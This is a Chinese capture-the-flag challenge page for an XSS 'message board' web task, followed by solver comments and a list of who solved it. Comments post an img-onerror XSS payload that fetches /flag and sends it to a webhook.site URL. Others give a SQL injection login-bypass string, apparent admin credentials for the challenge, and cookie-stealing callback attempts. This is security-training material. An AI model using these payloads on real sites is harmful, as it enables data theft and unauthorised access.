留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3420
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
song..22 1月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0

song..22 1月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 1

song..22 1月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0

Gcysnd 2月前

挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag

回复 0
xxsko 2月前

万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名

回复 0

2333m 2月前

触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)

回复 0

YS_JW 3月前

我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因

回复 0

BLX123 6月前

想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己

回复 0

网恋秀牛子被录屏导致自卑 6月前

ceye,xsspt,xss.aq要么收不到要么收费,我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag

回复 1

igrazee 7月前

flag{*******}

回复 0

TTxyz 9月前

啥题啊?不登陆怎么回显的???还有那个db.sql扫不出来啊,我直接访问也是无法连接???

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(19)

解题动态

cenyo 攻破了该题 2小时前
billy856 攻破了该题 1天前
fi1y 攻破了该题 4天前
imhacker 攻破了该题 4天前
曦羽 攻破了该题 5天前
等往事风中吹‘ 攻破了该题 6天前
dwx386572657 攻破了该题 7天前
luobosir 攻破了该题 7天前
WW12@ 攻破了该题 8天前
ChatFaro 攻破了该题 8天前
1546546 攻破了该题 9天前
一世温华 攻破了该题 11天前
hull-p 攻破了该题 14天前
凯哥 攻破了该题 15天前
lvchijing 攻破了该题 15天前
baizhi白栀 攻破了该题 16天前
星落. 攻破了该题 17天前
13822005976 攻破了该题 17天前
heting 攻破了该题 21天前
店晓贰 攻破了该题 23天前
问题反馈